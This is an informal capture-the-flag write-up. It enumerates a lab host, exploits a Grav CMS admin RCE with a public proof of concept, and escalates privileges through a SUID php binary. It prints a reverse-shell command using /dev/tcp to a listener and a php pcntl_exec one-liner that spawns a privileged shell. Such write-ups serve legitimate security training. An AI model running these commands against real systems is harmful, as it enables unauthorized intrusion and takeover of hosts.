# CTF1
## Recon (Enumeration)
### Nmap
`nmap --min-rate 3000 -p- 192.168.115.12 -Pn -sV -sC`
We Find only two ports open.
#### Port 80 (HTTP)
Seems to have a folder exposed to us.
It seems like some sort of CMS, though I have no idea what this is.
Lets see if we can find a version number and see if there are any RCE's associated with "Grav".
While doing some research I came across the folowing article which leads me to /admin.
{% embed url="" %}
Based on that article I was able to seemingly replicate the POC of the RCE
As a reminder the admin nonce is a hidden field in the form.
So given a 200, i suppose this CMS is vulnerable.
After doing a little bit more research, I found a POC online:
After a little bit of fiddling around I ran the following command. For the Ub3r Lazy :
```
python3 exploit.py -c "sh -i >& /dev/tcp/192.168.49.115/12345 0>&1" -t http://192.168.115.12/grav-admin
```
and...
We have a Shell!
After running linpeas we find a few interesting pieces of information
I attempted to priv esc with cron jobs but no luck.
After more recon I discovered a password hash
After spending many hours trying to crack this hash it was pointless.
### Privillege Escalation
For some reason I circled back and decided to look for SUID binaries manually, because why not?
So here is my frustration:
ALWAYS CHECK SUID BINARIES MANUALLY.
ALWAYS.
ALWAYS.
ALWAYS.
IDC WHAT YOU SAY. MANUAL.
FML
Anyway here is a link to that:
{% embed url="" %}
We notice that `/usr/bin/php7.4` this stands out
We find where the binary is: `/usr/bin/`
And based on GTFOBins we can just run `./php -r "pcntl_exec('/bin/sh', ['-p']);"`
im still kind of mad... Linpeas didnt pick it up.
